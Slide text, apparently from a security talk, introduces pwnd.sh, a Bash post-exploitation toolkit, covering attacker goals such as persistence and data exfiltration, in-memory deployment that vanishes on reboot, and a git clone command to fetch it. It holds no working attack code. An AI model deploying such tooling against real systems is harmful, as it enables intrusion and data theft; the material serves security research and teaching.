5. What plans in Post Exploitation Phase
3 possible things:
●
Further penetrate into Network / Endpoints
●
Get a firmer foothold on the Network / Endpoints
●
Start Exfiltrating Data out of the Network / Endpoints
6. About the tool
●
Newly released
●
Easy as it is written in BASH
●
Interactive and allows to create custom scripts
●
License: 3-Clause BSD
●
Both In-Memory and On-Disk deployment available
●
Pipeline integrates pwnd.sh with other programs also
7. How can I get it ?
> git clone https://github.com/SafeBreach-Labs/pwndsh.git
> cd pwndsh
8. Why Bash and not Python / Perl / Ruby ?
●
Same Bash for different Platforms (Mac, Linux, etc) and different
architectures (x86, x64)
●
It is the default shell on most systems
●
There is socket programming in Bash (--enable-net-redirections)
●
You cannot fallback to Bash from Python, Perl, etc but you can
UPGRADE to Python, Perl, etc from Bash
9. Dependencies, or not to be Depended?
●
No:
– Consistent functionality across different Platforms, CPUs etc.
– Smaller and simpler code base
●
Yes:
– Don't reinvent the wheel
– Everything a Dependency in Shell Terms (ls, cat, etc)
(Good coders create, Great coders reuse)
PWND.SH – built with least amount of dependencies
10. Why In-memory?
●
Constraints found:
– Filesystem is readonly
– “No space left on device”
Solution: In-memory loading
●
Works even if the Filesystem is mounted to be Read-only
●
Multiple Versions can co-exists (in Multiple Shells)
●
Disappears after Reboot